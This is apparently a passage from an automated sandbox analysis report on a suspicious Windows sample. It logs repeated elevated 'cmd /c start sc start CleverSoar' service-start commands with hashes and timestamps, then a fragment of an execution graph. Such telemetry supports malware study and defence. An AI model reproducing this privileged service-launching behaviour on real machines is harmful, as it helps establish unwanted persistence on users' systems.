                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:50
                                      Start time:02:49:02
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:51
                                      Start time:02:49:02
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:52
                                      Start time:02:49:02
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:53
                                      Start time:02:49:02
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:54
                                      Start time:02:49:02
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:55
                                      Start time:02:49:02
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:56
                                      Start time:02:49:02
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:57
                                      Start time:02:49:02
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:58
                                      Start time:02:49:02
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:59
                                      Start time:02:49:02
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:60
                                      Start time:02:49:02
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:61
                                      Start time:02:49:02
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:62
                                      Start time:02:49:03
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:63
                                      Start time:02:49:03
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:64
                                      Start time:02:49:03
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:65
                                      Start time:02:49:03
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:66
                                      Start time:02:49:03
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:67
                                      Start time:02:49:03
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:68
                                      Start time:02:49:03
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:69
                                      Start time:02:49:03
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:70
                                      Start time:02:49:03
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:71
                                      Start time:02:49:03
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:72
                                      Start time:02:49:03
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:73
                                      Start time:02:49:03
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:74
                                      Start time:02:49:03
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:75
                                      Start time:02:49:03
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:76
                                      Start time:02:49:03
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:77
                                      Start time:02:49:03
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:78
                                      Start time:02:49:04
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:79
                                      Start time:02:49:04
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:81
                                      Start time:02:49:04
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:82
                                      Start time:02:49:04
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:83
                                      Start time:02:49:04
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:84
                                      Start time:02:49:04
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:85
                                      Start time:02:49:04
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:86
                                      Start time:02:49:04
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:87
                                      Start time:02:49:04
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff70f330000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:88
                                      Start time:02:49:04
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:89
                                      Start time:02:49:04
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:90
                                      Start time:02:49:04
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:91
                                      Start time:02:49:04
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:92
                                      Start time:02:49:04
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:93
                                      Start time:02:49:05
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:94
                                      Start time:02:49:05
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:95
                                      Start time:02:49:05
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:96
                                      Start time:02:49:05
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:97
                                      Start time:02:49:05
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:98
                                      Start time:02:49:05
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:99
                                      Start time:02:49:05
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:100
                                      Start time:02:49:05
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:101
                                      Start time:02:49:05
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:102
                                      Start time:02:49:05
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:103
                                      Start time:02:49:05
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:104
                                      Start time:02:49:05
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:105
                                      Start time:02:49:05
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:106
                                      Start time:02:49:05
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:107
                                      Start time:02:49:05
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:108
                                      Start time:02:49:05
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true


                                        Execution Graph

                                        Execution Coverage:1.9%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:5.1%
                                        Total number of Nodes:742
                                        Total number of Limit Nodes:8
63033->63490 63491 6cbd26e0 24 API calls 4 library calls 63033->63491 63492 6cd08199 RaiseException 63033->63492 63035 6cba6f6e 63035->62986 63036->63035 63489 6cbd37e0 32 API calls std::_Xinvalid_argument 63036->63489 63040 6cba709e 63039->63040 63043 6cba70d1 63039->63043 63493 6cbd01f0 63040->63493 63041 6cba7183 63041->62986 63043->63041 63497 6cbd2250 30 API calls 63043->63497 63046 6cd0f938 67 API calls 63046->63043 63047 6cba71ae 63498 6cbd2340 24 API calls 63047->63498 63049 6cba71be 63499 6cd08199 RaiseException 63049->63499 63051 6cba71c9 63052->62986 63054->62992 63055->62999 63056->63001 63057->62994 63058->62997 63060 6cd05863 std::_Facet_Register 4 API calls 63059->63060 63061 6cbd207e 63060->63061 63062 6cd06147 43 API calls 63061->63062 63063 6cbd2092 63062->63063 63099 6cbd2f60 42 API calls 4 library calls 63063->63099 63065 6cbd20c8 63066 6cbd2136 63065->63066 63068 6cbd210d 63065->63068 63101 6cbd2250 30 API calls 63066->63101 63067 6cbd2120 63067->63013 63068->63067 63100 6cd05dae 9 API calls 2 library calls 63068->63100 63071 6cbd215b 63102 6cbd2340 24 API calls 63071->63102 63073 6cbd2171 63103 6cd08199 RaiseException 63073->63103 63075 6cbd217c 63075->63013 63077 6cd06153 __EH_prolog3 63076->63077 63104 6cd05cd5 63077->63104 63082 6cd06171 63118 6cd061da 39 API calls std::locale::_Setgloballocale 63082->63118 63083 6cd061cc 63083->63017 63085 6cd06179 63119 6cd05fd1 HeapFree GetLastError _Yarn ___std_exception_destroy 63085->63119 63087 6cd0618f 63110 6cd05d06 63087->63110 63089 6cbd1ddc 63088->63089 63090 6cba6d5d 63088->63090 63124 6cd06267 63089->63124 63090->63020 63095 6cbd2250 30 API calls 63090->63095 63094 6cbd1e82 63095->63022 63096->63024 63097->63026 63098->63028 63099->63065 63100->63067 63101->63071 63102->63073 63103->63075 63105 6cd05ce4 63104->63105 63106 6cd05ceb 63104->63106 63120 6cd0f1ed 6 API calls std::_Lockit::_Lockit 63105->63120 63107 6cd05ce9 63106->63107 63121 6cd073ab EnterCriticalSection 63106->63121 63107->63087 
